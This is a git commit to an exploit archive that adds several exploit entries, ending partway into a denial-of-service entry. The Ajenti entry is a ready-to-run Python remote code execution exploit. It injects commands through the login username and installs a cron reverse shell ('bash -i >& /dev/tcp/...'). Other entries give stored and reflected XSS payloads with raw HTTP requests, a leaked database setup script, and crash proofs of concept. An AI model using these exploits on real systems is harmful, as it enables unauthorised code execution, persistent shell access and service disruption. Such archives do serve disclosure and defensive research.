DB: 2019-10-15
6 changes to exploits/shellcodes SpotAuditor 5.3.1.0 - Denial of Service ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service Uplay 92.0.0.6280 - Local Privilege Escalation Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting Ajenti 2.1.31 - Remote Code Execution Kirona-DRS 5.5.3.5 - Information Disclosure
This commit is contained in:
parent
2b52915f75
commit
7c5ad20e72
7 changed files with 618 additions and 0 deletions
62
exploits/php/webapps/47496.txt
Normal file
62
exploits/php/webapps/47496.txt
Normal file
|
@ -0,0 +1,62 @@
|
||||||
|
# Exploit Title: Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting
|
||||||
|
# Exploit Author: Debashis Pal
|
||||||
|
# Date: 2019-10-13
|
||||||
|
# Vendor Homepage: https://www.nchsoftware.com/
|
||||||
|
# Source: https://www.nchsoftware.com/invoice/index.html
|
||||||
|
# Version: Express Invoice v7.12
|
||||||
|
# CVE : N/A
|
||||||
|
# Tested on: Windows 7 SP1(32bit)
|
||||||
|
|
||||||
|
# About Express Invoice v7.12
|
||||||
|
==============================
|
||||||
|
Express Invoice lets you create invoices you can print, email or fax directly to clients for faster payment.
|
||||||
|
|
||||||
|
# Vulnerability
|
||||||
|
================
|
||||||
|
Persistent Cross site scripting (XSS).
|
||||||
|
|
||||||
|
# PoC
|
||||||
|
======
|
||||||
|
|
||||||
|
1. Login as authenticated unprivileged user to Express Invoice version 7.12 web enable service i.e http://A.B.C.D:96 [Default installation].
|
||||||
|
|
||||||
|
2. Under "Invoices" Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script>
|
||||||
|
|
||||||
|
Save the change.
|
||||||
|
|
||||||
|
or
|
||||||
|
|
||||||
|
Under "Items"
|
||||||
|
Items -> Add new item-> Item field: put </script><script>alert('XSS');</script>
|
||||||
|
|
||||||
|
Save the change.
|
||||||
|
|
||||||
|
or
|
||||||
|
|
||||||
|
Under "Customers"
|
||||||
|
Customers -> Add New Customer -> Customer Name: put </script><script>alert('XSS');</script>
|
||||||
|
|
||||||
|
Save the change.
|
||||||
|
|
||||||
|
or
|
||||||
|
|
||||||
|
Under "Quotes"
|
||||||
|
Quotes -> View Quotes -> Add New Quote -> Customer: put </script><script>alert('XSS');</script>
|
||||||
|
|
||||||
|
Save the change.
|
||||||
|
|
||||||
|
3. Login in authenticated privileged or unprivileged user to Express Invoice v7.12 web enable service and visit any of Invoices/Items/Customers/Quotes section, Persistent XSS payload will execute.
|
||||||
|
|
||||||
|
|
||||||
|
# Disclosure Timeline
|
||||||
|
======================
|
||||||
|
Vulnerability Discover Date: 12-Sep-2019.
|
||||||
|
Vulnerability notification to vendor via vendor provided web form: 12-Sep-2019 ,13-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds.
|
||||||
|
Submit exploit-db : 14-Oct-2019.
|
||||||
|
|
||||||
|
|
||||||
|
# Disclaimer
|
||||||
|
=============
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
|
||||||
|
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
|
329
exploits/php/webapps/47498.txt
Normal file
329
exploits/php/webapps/47498.txt
Normal file
|
@ -0,0 +1,329 @@
|
||||||
|
# Exploit Title: Kirona-DRS 5.5.3.5 - Information Disclosure
|
||||||
|
# Discovered Date: 2019-10-03
|
||||||
|
# Shodan Search: /opt-portal/pages/login.xhtml
|
||||||
|
# Exploit Author: Ramikan
|
||||||
|
# Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/
|
||||||
|
# Affected Version: DRS 5.5.3.5 may be other versions.
|
||||||
|
# Tested On Version: DRS 5.5.3.5 on PHP/5.6.14
|
||||||
|
# Vendor Fix: Unknown
|
||||||
|
# CVE: CVE-2019-17503,CVE-2019-17504
|
||||||
|
# Category: Web Apps
|
||||||
|
# Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities
|
||||||
|
|
||||||
|
# Description:
|
||||||
|
# The application is vulnerable to the HTML injection, reflected cross site scripting and sensitive data disclosure.
|
||||||
|
|
||||||
|
# Vulnerabiity 1:HTML injection and (CVE-2019-17504)
|
||||||
|
# An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected Cross-site scripting (XSS)
|
||||||
|
# vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter.
|
||||||
|
|
||||||
|
Affected URL: /osm/report/
|
||||||
|
|
||||||
|
Affected Parameter: password
|
||||||
|
|
||||||
|
|
||||||
|
POST Request:
|
||||||
|
|
||||||
|
POST /osm/report/ HTTP/1.1
|
||||||
|
Host: 10.50.3.148
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-GB,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 147
|
||||||
|
Connection: close
|
||||||
|
Referer: https://10.50.3.148/osm/report/
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
create=true&password=&login=admin&password='<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--
|
||||||
|
|
||||||
|
|
||||||
|
Response:
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Date: Thu, 03 Oct 2019 14:56:05 GMT
|
||||||
|
Server: Apache
|
||||||
|
X-Powered-By: PHP/5.6.14
|
||||||
|
Access-Control-Allow-Origin: *
|
||||||
|
Access-Control-Allow-Headers: X-Requested-WithXDomainRequestAllowed: 1
|
||||||
|
Expires: Mon, 26 Jul 1997 05:00:00 GMT
|
||||||
|
Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT
|
||||||
|
Cache-Control: no-cache, must-revalidate
|
||||||
|
Pragma: no-cache
|
||||||
|
Content-Length: 728
|
||||||
|
Connection: close
|
||||||
|
Content-Type: text/html;charset=UTF-8
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<img src='logo.jpg'>
|
||||||
|
<form method='POST'>
|
||||||
|
<input type='hidden' name='create' value='true'/>
|
||||||
|
<input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
|
||||||
|
<table>
|
||||||
|
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
|
||||||
|
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
|
||||||
|
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
|
||||||
|
</table>
|
||||||
|
</form>
|
||||||
|
</head>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
GET Request:
|
||||||
|
|
||||||
|
GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1
|
||||||
|
Host: vs-kdrs-l-01.selwoodhousing.local
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-GB,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
|
||||||
|
Response:
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Date: Thu, 03 Oct 2019 14:53:35 GMT
|
||||||
|
Server: Apache
|
||||||
|
X-Powered-By: PHP/5.6.14
|
||||||
|
Access-Control-Allow-Origin: *
|
||||||
|
Access-Control-Allow-Headers: X-Requested-With
|
||||||
|
XDomainRequestAllowed: 1
|
||||||
|
Expires: Mon, 26 Jul 1997 05:00:00 GMT
|
||||||
|
Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT
|
||||||
|
Cache-Control: no-cache, must-revalidate
|
||||||
|
Pragma: no-cache
|
||||||
|
Content-Length: 728
|
||||||
|
Connection: close
|
||||||
|
Content-Type: text/html;charset=UTF-8
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<img src='logo.jpg'>
|
||||||
|
<form method='POST'>
|
||||||
|
<input type='hidden' name='create' value='true'/>
|
||||||
|
<input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
|
||||||
|
<table>
|
||||||
|
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
|
||||||
|
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
|
||||||
|
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
|
||||||
|
</table>
|
||||||
|
</form>
|
||||||
|
</head>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
***************************************************************************************************************************
|
||||||
|
Vulnerability 2: Source code and sensitive data disclosure. (CVE-2019-17503)
|
||||||
|
***************************************************************************************************************************
|
||||||
|
|
||||||
|
An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc.
|
||||||
|
|
||||||
|
Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd
|
||||||
|
|
||||||
|
# Request:
|
||||||
|
|
||||||
|
GET /osm/REGISTER.cmd HTTP/1.1
|
||||||
|
Host: 10.0.0.148
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-GB,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
|
||||||
|
Response:
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Date: Thu, 03 Oct 2019 09:23:54 GMT
|
||||||
|
Server: Apache
|
||||||
|
Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT
|
||||||
|
ETag: "1fc4-55d612f6cae13"
|
||||||
|
Accept-Ranges: bytes
|
||||||
|
Content-Length: 8132
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
@echo off
|
||||||
|
|
||||||
|
set DEBUGMAPSCRIPT=TRUE
|
||||||
|
|
||||||
|
rem
|
||||||
|
rem Find root path and batch name
|
||||||
|
rem root path is found relative to the current batch name
|
||||||
|
rem
|
||||||
|
|
||||||
|
rem turn to short filename (remove white spaces)
|
||||||
|
for %%i in (%0) do (
|
||||||
|
set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi
|
||||||
|
set MAPSCRIPTBATCH_FILE=%%~i
|
||||||
|
|
||||||
|
)
|
||||||
|
for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do (
|
||||||
|
set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\..
|
||||||
|
)
|
||||||
|
|
||||||
|
if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR%
|
||||||
|
if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE%
|
||||||
|
|
||||||
|
rem
|
||||||
|
rem find if we are in INTERRACTIVE mode or not and check the parameters
|
||||||
|
rem
|
||||||
|
if "%1"=="" goto INTERACTIVE
|
||||||
|
goto NONINTERRACTIVE
|
||||||
|
|
||||||
|
|
||||||
|
:NONINTERRACTIVE
|
||||||
|
rem non interractive call so catch the parameters from command line
|
||||||
|
rem this is supposed to be called from the root DRS directory
|
||||||
|
|
||||||
|
if "%2"=="" (
|
||||||
|
echo Invalid parameter 2
|
||||||
|
pause
|
||||||
|
goto :EOF
|
||||||
|
)
|
||||||
|
|
||||||
|
set ACCOUNT=%2
|
||||||
|
set STATIC=NO
|
||||||
|
if "%1"=="STATIC" set STATIC=YES
|
||||||
|
|
||||||
|
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT%
|
||||||
|
|
||||||
|
if "%1"=="STATIC" goto GLOBAL
|
||||||
|
if "%1"=="DYNAMIC" goto GLOBAL
|
||||||
|
echo Invalid parameter 1
|
||||||
|
pause
|
||||||
|
goto :EOF
|
||||||
|
|
||||||
|
:INTERACTIVE
|
||||||
|
rem Interractive mode : ask for account and static mode
|
||||||
|
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode
|
||||||
|
echo Open Street Map setup for Xmbrace DRS
|
||||||
|
set /P ACCOUNT=Account name:
|
||||||
|
set /P STATIC=Limited map feature (YES/NO):
|
||||||
|
|
||||||
|
|
||||||
|
rem back to the setup directory
|
||||||
|
cd %MAPSCRIPTROOTDIR%
|
||||||
|
|
||||||
|
rem # READ AND DEFINE SETTINGS
|
||||||
|
for /F "tokens=1,* delims==" %%k in (conf\default.txt) do (
|
||||||
|
if not "%%k"=="#=" set %%k=%%l
|
||||||
|
)
|
||||||
|
if exist CUSTOM\CONF\custom.txt (
|
||||||
|
for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do (
|
||||||
|
if not "%%k"=="#=" set %%k=%%l
|
||||||
|
)
|
||||||
|
)
|
||||||
|
for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do (
|
||||||
|
if not "%%k"=="#=" set %%k=%%l
|
||||||
|
)
|
||||||
|
|
||||||
|
if "%APACHE_USE_SSL%"=="TRUE" (
|
||||||
|
set DEFAULT_HTTP_PROTOCOL=https
|
||||||
|
set APACHE_USE_SSL_VALUE=true
|
||||||
|
set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT%
|
||||||
|
) else (
|
||||||
|
set DEFAULT_HTTP_PROTOCOL=http
|
||||||
|
set APACHE_USE_SSL_VALUE=false
|
||||||
|
set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT%
|
||||||
|
)
|
||||||
|
|
||||||
|
goto GLOBAL
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
rem
|
||||||
|
rem good to go in a non interractive mode
|
||||||
|
rem the following is the generic par of the install, whatever we are in static or dynamic mode
|
||||||
|
rem
|
||||||
|
:GLOBAL
|
||||||
|
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section
|
||||||
|
|
||||||
|
set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe"
|
||||||
|
|
||||||
|
echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE)
|
||||||
|
|
||||||
|
if "%STATIC%"=="YES" goto :STATIC
|
||||||
|
goto :DYNAMIC
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
:STATIC
|
||||||
|
|
||||||
|
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section
|
||||||
|
|
||||||
|
echo map=static > ACCOUNTS\%ACCOUNT%\config.txt
|
||||||
|
|
||||||
|
echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php
|
||||||
|
|
||||||
|
echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
if exist req.sql del req.sql
|
||||||
|
goto FINAL
|
||||||
|
|
||||||
|
|
||||||
|
:DYNAMIC
|
||||||
|
|
||||||
|
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section
|
||||||
|
|
||||||
|
echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt
|
||||||
|
|
||||||
|
echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php
|
||||||
|
|
||||||
|
echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
echo insert into %INSERTFIELDS% values ('Show on map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
|
||||||
|
rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
|
||||||
|
set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT)
|
||||||
|
|
||||||
|
echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql
|
||||||
|
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
|
||||||
|
|
||||||
|
if exist req.sql del req.sql
|
||||||
|
goto FINAL
|
||||||
|
|
||||||
|
|
||||||
|
:FINAL
|
||||||
|
echo Map registred for %ACCOUNT%
|
||||||
|
if "%1"=="" pause
|
||||||
|
goto :EOF
|
115
exploits/python/webapps/47497.py
Executable file
115
exploits/python/webapps/47497.py
Executable file
|
@ -0,0 +1,115 @@
|
||||||
|
# Title: Ajenti 2.1.31 - Remote Code Execution
|
||||||
|
# Author: Jeremy Brown
|
||||||
|
# Date: 2019-10-13
|
||||||
|
# Software Link: https://github.com/ajenti/ajenti
|
||||||
|
# CVE: N/A
|
||||||
|
# Tested on: Ubuntu Linux
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
# ajentix.py
|
||||||
|
#
|
||||||
|
# Ajenti Remote Command Execution Exploit
|
||||||
|
#
|
||||||
|
# -------
|
||||||
|
# Details
|
||||||
|
# -------
|
||||||
|
#
|
||||||
|
# Ajenti is a web control panel written in Python and AngularJS.
|
||||||
|
#
|
||||||
|
# One can locally monitor executed commands on the server while testing
|
||||||
|
#
|
||||||
|
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
|
||||||
|
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
|
||||||
|
# Reading process events from proc connector.
|
||||||
|
# Hit Ctrl-C to exit
|
||||||
|
#
|
||||||
|
# Browse over to https://server:8000/view/login/normal to login
|
||||||
|
#
|
||||||
|
# .....
|
||||||
|
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
|
||||||
|
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
|
||||||
|
#
|
||||||
|
# Modified the JSON request username value to be `id`
|
||||||
|
#
|
||||||
|
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
|
||||||
|
# pid=7516 executed [id ]
|
||||||
|
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
|
||||||
|
#
|
||||||
|
# *ACK.....*
|
||||||
|
#
|
||||||
|
# Also the login routine times out after 5 seconds (see auth.py), which
|
||||||
|
# makes an interactive shell relatively ephemeral. So, we cron job.
|
||||||
|
#
|
||||||
|
# $ python3 ajentix.py server.ip shell local-listener.ip
|
||||||
|
# Done!
|
||||||
|
#
|
||||||
|
# $ nc -v -l -p 5555
|
||||||
|
# Listening on [0.0.0.0] (family 0, port 5555)
|
||||||
|
# Connection from server.domain 41792 received!
|
||||||
|
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
|
||||||
|
# bash: no job control in this shell
|
||||||
|
# nobody@server:/var/spool/cron$ ps
|
||||||
|
# PID TTY TIME CMD
|
||||||
|
# 6386 ? 00:00:00 /usr/local/bin/ <-- ajenti-panel worker
|
||||||
|
# 18849 ? 00:00:00 sh
|
||||||
|
# 18851 ? 00:00:00 bash
|
||||||
|
# 18859 ? 00:00:00 ps
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
|
||||||
|
#
|
||||||
|
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
|
||||||
|
#
|
||||||
|
#
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import ssl
|
||||||
|
import json
|
||||||
|
import urllib.request as request
|
||||||
|
|
||||||
|
def main():
|
||||||
|
if(len(sys.argv) < 2):
|
||||||
|
print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
|
||||||
|
print("Eg: %s 1.2.3.4 \"id\"" % sys.argv[0])
|
||||||
|
print("... %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
|
||||||
|
return
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
cmd = sys.argv[2]
|
||||||
|
|
||||||
|
if(cmd == 'shell'):
|
||||||
|
if(len(sys.argv) < 4):
|
||||||
|
print("Error: need ip to connect back to for shell")
|
||||||
|
return
|
||||||
|
|
||||||
|
ip = sys.argv[3]
|
||||||
|
|
||||||
|
shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`"
|
||||||
|
username = shell
|
||||||
|
|
||||||
|
else:
|
||||||
|
username = "`" + cmd + "`"
|
||||||
|
|
||||||
|
body = json.dumps({'username':username, 'password':'test', 'mode':'normal'})
|
||||||
|
byte = body.encode('utf-8')
|
||||||
|
|
||||||
|
url = "https://" + host + ":8000" + "/api/core/auth"
|
||||||
|
|
||||||
|
try:
|
||||||
|
req = request.Request(url)
|
||||||
|
|
||||||
|
req.add_header('Content-Type', 'application/json; charset=utf-8')
|
||||||
|
req.add_header('Content-Length', len(byte))
|
||||||
|
|
||||||
|
request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert
|
||||||
|
|
||||||
|
except Exception as error:
|
||||||
|
print("Error: %s" % error)
|
||||||
|
return
|
||||||
|
|
||||||
|
print("Done!")
|
||||||
|
|
||||||
|
|
||||||
|
if(__name__ == '__main__'):
|
||||||
|
main()
|
32
exploits/windows/dos/47494.py
Executable file
32
exploits/windows/dos/47494.py
Executable file
|
@ -0,0 +1,32 @@
|
||||||
|
# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
|
||||||
|
# Author: Sanjana Shetty
|
||||||
|
# Date: 2019-10-13
|
||||||
|
# Version: SpotAuditor 5.3.1.0
|
||||||
|
# Vendor Homepage: http://www.nsauditor.com
|
||||||
|
# Software link: http://spotauditor.nsauditor.com/
|
||||||
|
|
||||||
|
|
||||||
|
# <POC by Sanjana Shetty>
|
||||||
|
# Steps
|
||||||
|
|
||||||
|
[1] Install the SpotAuditor software
|
||||||
|
|
||||||
|
[2] Access the register functionality
|
||||||
|
|
||||||
|
[3] In the name field enter 5000 A's and press enter, this will crash the
|
||||||
|
application.
|
||||||
|
|
||||||
|
==== use below script to create 5000 A's to a text file and copy it to the name field============
|
||||||
|
|
||||||
|
|
||||||
|
print ("# POC by sanjana shetty")
|
||||||
|
|
||||||
|
try:
|
||||||
|
f = open("file.txt","w")
|
||||||
|
junk = "\x41" * 5000
|
||||||
|
f.write(junk)
|
||||||
|
print ("done")
|
||||||
|
|
||||||
|
except (Exception, e):
|
||||||
|
|
||||||
|
print ("#error - ") + str(e)
|
31
exploits/windows/dos/47495.py
Executable file
31
exploits/windows/dos/47495.py
Executable file
|
@ -0,0 +1,31 @@
|
||||||
|
# Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service
|
||||||
|
# Date: 2019-10-12
|
||||||
|
# Vendor Homepage: https://www.actfax.com/
|
||||||
|
# Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe
|
||||||
|
# Exploit Author: Achilles
|
||||||
|
# Tested Version: 6.92
|
||||||
|
# Tested on: Windows 7 x64
|
||||||
|
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
|
||||||
|
|
||||||
|
# Steps to Produce the Crash:
|
||||||
|
